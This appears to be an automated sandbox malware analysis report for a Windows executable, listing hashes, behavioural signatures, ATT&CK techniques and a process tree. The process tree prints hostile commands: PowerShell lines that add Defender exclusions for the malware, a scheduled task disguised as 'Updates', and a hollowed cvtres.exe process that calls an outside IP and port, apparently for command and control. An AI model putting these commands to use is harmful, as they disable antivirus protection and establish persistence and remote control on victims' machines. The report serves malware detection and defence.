Analysis
-
max time kernel
122s -
max time network
157s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
28-02-2024 02:24
Static task
static1
Behavioral task
behavioral1
Sample
aac22c5c90004cfeecd76e274e029ef3.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
aac22c5c90004cfeecd76e274e029ef3.exe
Resource
win10v2004-20240226-en
General
-
Target
aac22c5c90004cfeecd76e274e029ef3.exe
-
Size
972KB
-
MD5
aac22c5c90004cfeecd76e274e029ef3
-
SHA1
eea98faea4d810e940c7d9f62fb8035a0d48b3f6
-
SHA256
350bcbd13848e76b30da41278a0b0f3c2ca6d9c3b4e5b5cdb64ee24c8c8f9470
-
SHA512
04cde8b071172a3f8ac5bc3f74dbcff89c2ec3c1b1884e3f6a569d82b0efcf322bbf883cfb056c29b1769688e916c731770acc355fdd5d4c8f59348779005ce3
-
SSDEEP
12288:45DJZ9aHYol3wwuMx4tbV6LjKm96TVQxbyv99MT5t:45lalbuMWULjKgfyvM
Malware Config
Signatures
-
Modifies Installed Components in the registry 2 TTPs 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Software\Microsoft\Active Setup\Installed Components explorer.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation aac22c5c90004cfeecd76e274e029ef3.exe -
Enumerates connected drives 3 TTPs 2 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\D: explorer.exe File opened (read-only) \??\F: explorer.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 2248 set thread context of 4020 2248 Process not Found 113 PID 4020 set thread context of 3792 4020 aac22c5c90004cfeecd76e274e029ef3.exe 114 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 852 schtasks.exe -
Modifies registry class 9 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU explorer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ explorer.exe Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ explorer.exe Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3808065738-1666277613-1125846146-1000\{2C536B6A-9A05-4881-BC7C-1AA3FD4BC841} explorer.exe Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings explorer.exe Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff explorer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ explorer.exe -
Suspicious behavior: EnumeratesProcesses 11 IoCs
pid Process 2248 Process not Found 2248 Process not Found 1516 powershell.exe 1516 powershell.exe 3096 powershell.exe 3096 powershell.exe 4508 powershell.exe 4508 powershell.exe 1516 powershell.exe 4508 powershell.exe 3096 powershell.exe -
Suspicious use of AdjustPrivilegeToken 14 IoCs
description pid Process Token: SeDebugPrivilege 1516 powershell.exe Token: SeDebugPrivilege 3096 powershell.exe Token: SeDebugPrivilege 2248 Process not Found Token: SeDebugPrivilege 4508 powershell.exe Token: SeShutdownPrivilege 1092 explorer.exe Token: SeCreatePagefilePrivilege 1092 explorer.exe Token: SeShutdownPrivilege 1092 explorer.exe Token: SeCreatePagefilePrivilege 1092 explorer.exe Token: SeShutdownPrivilege 1092 explorer.exe Token: SeCreatePagefilePrivilege 1092 explorer.exe Token: SeShutdownPrivilege 1092 explorer.exe Token: SeCreatePagefilePrivilege 1092 explorer.exe Token: SeShutdownPrivilege 1092 explorer.exe Token: SeCreatePagefilePrivilege 1092 explorer.exe -
Suspicious use of FindShellTrayWindow 6 IoCs
pid Process 1092 explorer.exe 1092 explorer.exe 1092 explorer.exe 1092 explorer.exe 1092 explorer.exe 1092 explorer.exe -
Suspicious use of SendNotifyMessage 8 IoCs
pid Process 1092 explorer.exe 1092 explorer.exe 1092 explorer.exe 1092 explorer.exe 1092 explorer.exe 1092 explorer.exe 1092 explorer.exe 1092 explorer.exe -
Suspicious use of WriteProcessMemory 33 IoCs
description pid Process procid_target PID 2248 wrote to memory of 1516 2248 aac22c5c90004cfeecd76e274e029ef3.exe 104 PID 2248 wrote to memory of 1516 2248 aac22c5c90004cfeecd76e274e029ef3.exe 104 PID 2248 wrote to memory of 1516 2248 aac22c5c90004cfeecd76e274e029ef3.exe 104 PID 2248 wrote to memory of 3096 2248 aac22c5c90004cfeecd76e274e029ef3.exe 106 PID 2248 wrote to memory of 3096 2248 aac22c5c90004cfeecd76e274e029ef3.exe 106 PID 2248 wrote to memory of 3096 2248 aac22c5c90004cfeecd76e274e029ef3.exe 106 PID 2248 wrote to memory of 852 2248 Process not Found 108 PID 2248 wrote to memory of 852 2248 Process not Found 108 PID 2248 wrote to memory of 852 2248 Process not Found 108 PID 2248 wrote to memory of 4508 2248 Process not Found 110 PID 2248 wrote to memory of 4508 2248 Process not Found 110 PID 2248 wrote to memory of 4508 2248 Process not Found 110 PID 2248 wrote to memory of 1812 2248 Process not Found 112 PID 2248 wrote to memory of 1812 2248 Process not Found 112 PID 2248 wrote to memory of 1812 2248 Process not Found 112 PID 2248 wrote to memory of 4020 2248 Process not Found 113 PID 2248 wrote to memory of 4020 2248 Process not Found 113 PID 2248 wrote to memory of 4020 2248 Process not Found 113 PID 2248 wrote to memory of 4020 2248 Process not Found 113 PID 2248 wrote to memory of 4020 2248 Process not Found 113 PID 2248 wrote to memory of 4020 2248 Process not Found 113 PID 2248 wrote to memory of 4020 2248 Process not Found 113 PID 2248 wrote to memory of 4020 2248 Process not Found 113 PID 4020 wrote to memory of 1092 4020 aac22c5c90004cfeecd76e274e029ef3.exe 116 PID 4020 wrote to memory of 1092 4020 aac22c5c90004cfeecd76e274e029ef3.exe 116 PID 4020 wrote to memory of 3792 4020 aac22c5c90004cfeecd76e274e029ef3.exe 114 PID 4020 wrote to memory of 3792 4020 aac22c5c90004cfeecd76e274e029ef3.exe 114 PID 4020 wrote to memory of 3792 4020 aac22c5c90004cfeecd76e274e029ef3.exe 114 PID 4020 wrote to memory of 3792 4020 aac22c5c90004cfeecd76e274e029ef3.exe 114 PID 4020 wrote to memory of 3792 4020 aac22c5c90004cfeecd76e274e029ef3.exe 114 PID 4020 wrote to memory of 3792 4020 aac22c5c90004cfeecd76e274e029ef3.exe 114 PID 4020 wrote to memory of 3792 4020 aac22c5c90004cfeecd76e274e029ef3.exe 114 PID 4020 wrote to memory of 3792 4020 aac22c5c90004cfeecd76e274e029ef3.exe 114
Processes
-
C:\Users\Admin\AppData\Local\Temp\aac22c5c90004cfeecd76e274e029ef3.exe"C:\Users\Admin\AppData\Local\Temp\aac22c5c90004cfeecd76e274e029ef3.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2248 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\aac22c5c90004cfeecd76e274e029ef3.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1516
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\dAFbvNYf.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3096
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dAFbvNYf" /XML "C:\Users\Admin\AppData\Local\Temp\tmpBF9D.tmp"2⤵
- Creates scheduled task(s)
PID:852
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\dAFbvNYf.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4508
-
-
C:\Users\Admin\AppData\Local\Temp\aac22c5c90004cfeecd76e274e029ef3.exe"C:\Users\Admin\AppData\Local\Temp\aac22c5c90004cfeecd76e274e029ef3.exe"2⤵PID:1812
-
-
C:\Users\Admin\AppData\Local\Temp\aac22c5c90004cfeecd76e274e029ef3.exe"C:\Users\Admin\AppData\Local\Temp\aac22c5c90004cfeecd76e274e029ef3.exe"2⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4020 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Default 23.105.131.193 8488 sqMUAgrfv3⤵PID:3792
-
-
C:\Windows\explorer.exe"C:\Windows\explorer.exe"3⤵
- Modifies Installed Components in the registry
- Enumerates connected drives
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1092
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=1408 --field-trial-handle=2280,i,4114443225282860369,4764091921472631035,262144 --variations-seed-version /prefetch:81⤵PID:2164
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca1⤵PID:3772
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵PID:1776
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵PID:404
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵PID:4840
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\aac22c5c90004cfeecd76e274e029ef3.exe.log
Filesize1KB
MD58ec831f3e3a3f77e4a7b9cd32b48384c
SHA1d83f09fd87c5bd86e045873c231c14836e76a05c
SHA2567667e538030e3f8ce2886e47a01af24cb0ea70528b1e821c5d8832c5076cb982
SHA51226bffa2406b66368bd412bf25869a792631455645992cdcade2dbc13a2e56fb546414a6a9223b94c96c38d89187add6678d4779a88b38b0c9e36be8527b213c3
-
Filesize
2KB
MD5968cb9309758126772781b83adb8a28f
SHA18da30e71accf186b2ba11da1797cf67f8f78b47c
SHA25692099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA5124bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3
-
Filesize
18KB
MD5bef81051353b6871cd1e157780eb1462
SHA131a2dc3690d798b33d2521469c950687f3788a75
SHA2568b29b77983e3cd31d8653dce9598a76a04e0a9df929649c4ab4cafde3f39a017
SHA512e409fcb969b4c7628a95c7aed9097ff2ea6d97be3acf6451b16223cc4ba672e17066fa65948d78cd1e784bbd29da94eebb8a3f5b6840face038615ea9122f45f
-
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133535607819993314.txt
Filesize74KB
MD580dffedad36ef4c303579f8c9be9dbd7
SHA1792ca2a83d616ca82d973ece361ed9e95c95a0d8
SHA256590ca4d2f62a7864a62ccb1075c55191f7f9d5c5304ea3446961bb50f9e3916e
SHA512826b97a4de7c765f8f5ebc520960f68381fd9f4bfe68c2fbe46c6118110c9c14a87dcb8ed8102e60a954b4b3c408f72e7a93fd96317be3d51120a2ddd2faa3ea
-
C:\Users\Admin\AppData\Local\Packages\microsoft.windows.search_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\5MIHM5LV\microsoft.windows[1].xml
Filesize96B
MD584209e171da10686915fe7efcd51552d
SHA16bf96e86a533a68eba4d703833de374e18ce6113
SHA25604d6050009ea3c99cc718ad1c07c5d15268b459fcfb63fcb990bc9761738907b
SHA51248d2524000911cfb68ef866dedac78ee430d79aa3f4b68399f645dc2066841e6962e11a3362cbcec46680357dcd3e58cfef9994450fed1d8af04df44f76b0dfd
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
1KB
MD5e7ab1e37cec4dffe93ca4628b8ad0005
SHA1fdad95b82ca91fc5455fb1e7fb50684a86a227cd
SHA2566accc2f72094c9f2902c21cc6241118aeca6cfc16eb58b42fe5ab771be4b223a
SHA512e3e3f2bf6cb3c60111b88b941b1e72a7a53635cc29cdc2ddf7a06cb226e9b6fbb3dcd1f27f255bfde1193bb704d8fe6ca35a6a24e104f2c96377774904109736